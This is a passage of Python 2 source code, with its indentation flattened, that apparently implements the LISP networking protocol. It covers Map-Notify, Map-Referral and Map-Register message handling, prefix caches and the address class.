#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False), rloc.rle.print_rle(False)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
# Get map-server so we can do statistics and find auth-key, if a auth-key
# was provided in a Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
# Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify()
# starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
# in this site. There is probably a RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
#endof
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
# Process each EID record in Map-Reply message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
# Check for Map-Referral looping. If there is no loop cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
# Set dirty-bit so we can remove referral-nodes from cached entry
# that wasn't in packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (referral.referral_set.has_key(addr_str) == False):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authenticaiton for Map-Register message and sent to supplied
# Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
# a Map-Server, we can't join the group by using the group so we have to
# send to the loopback address to bootstrap our membership. We join to
# one other member of the peer-group so we can get the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use 16-byte key which is
# 32 string characters.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send LISP control packet that is to be source from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
# For sending Map-Requests, if the NAT-traversal configured, use same
# socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associatative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries():
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache():
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False):
self.cache[ml] = lisp_cache_entries()
self.cache[ml].entries = {}
self.cache[ml].entries_sorted = []
self.cache_sorted = sorted(self.cache)
#endif
if (self.cache[ml].entries.has_key(key) == False):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
self.cache[ml].entries_sorted = sorted(self.cache[ml].entries)
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (self.cache.has_key(ml_key) == False): return(None)
if (self.cache[ml_key].entries.has_key(key) == False): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry_key in self.cache[ml].entries_sorted:
entries = self.cache[ml].entries
if (entry_key in entries):
entry = entries[entry_key]
if (entry == None): continue
if (prefix.is_more_specific(entry.eid)): found = entry
#endif
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False): return
if (self.cache[ml].entries.has_key(key) == False): return
self.cache[ml].entries.pop(key)
self.cache[ml].entries_sorted.remove(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
# more-specifics, this entry will not be retunred if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
# not find 2.2.2.2, what is retunred is 224.1.1.1/32 and not 224.0.0.0/4.
#
# So we will look at the retunred entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a python parcularity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address():
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = ""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += self.address + "\0"
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
